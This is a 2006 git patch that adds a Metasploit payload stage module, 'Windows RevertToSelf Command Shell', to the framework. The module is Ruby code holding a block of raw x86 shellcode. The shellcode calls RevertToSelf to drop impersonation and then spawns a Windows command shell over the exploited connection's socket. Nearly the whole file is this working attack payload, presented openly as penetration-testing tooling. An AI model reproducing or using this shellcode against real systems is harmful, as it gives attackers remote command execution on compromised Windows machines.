From 4934bd770902cee7bf7263a1a2745a2d25138e12 Mon Sep 17 00:00:00 2001 From: Matt Miller Date: Sat, 7 Jan 2006 19:25:18 +0000 Subject: [PATCH] rename pipe shell to shell and shell to shell_revert git-svn-id: file:///home/svn/incoming/trunk@3325 4d416f70-5f16-0410-b530-b9f4589650da --- .../payloads/stages/windows/shell_revert.rb | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 modules/payloads/stages/windows/shell_revert.rb diff --git a/modules/payloads/stages/windows/shell_revert.rb b/modules/payloads/stages/windows/shell_revert.rb new file mode 100644 index 0000000000..28efffe729 --- /dev/null +++ b/modules/payloads/stages/windows/shell_revert.rb @@ -0,0 +1,49 @@ +require 'msf/core' + +module Msf +module Payloads +module Stages +module Windows + +module Shell + + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows RevertToSelf Command Shell', + 'Version' => '$Revision$', + 'Description' => 'Call RevertToSelf and spawn a command shell', + 'Author' => 'hdm', + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'sockedi', + 'SymbolLookup' => 'ebp', + }, + 'Stage' => + { + 'Offsets' => + { + 'EXITFUNC' => [ 103 + 28, 'V' ] + }, + 'Payload' => + "\xe8\x09\x00\x00\x00\x41\x44\x56\x41\x50\x49\x33\x32\x00\xff\x55" + + "\x08\x50\x68\x2a\xc8\xde\x50\xff\x55\x04\xff\xd0" + + "\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a" + + "\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7" + + "\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24" + + "\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x53" + + "\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89\xe6" + + "\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff\xff" + + "\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31\xdb" + + "\x53\xff\xd0" + } + )) + end + +end + +end end end end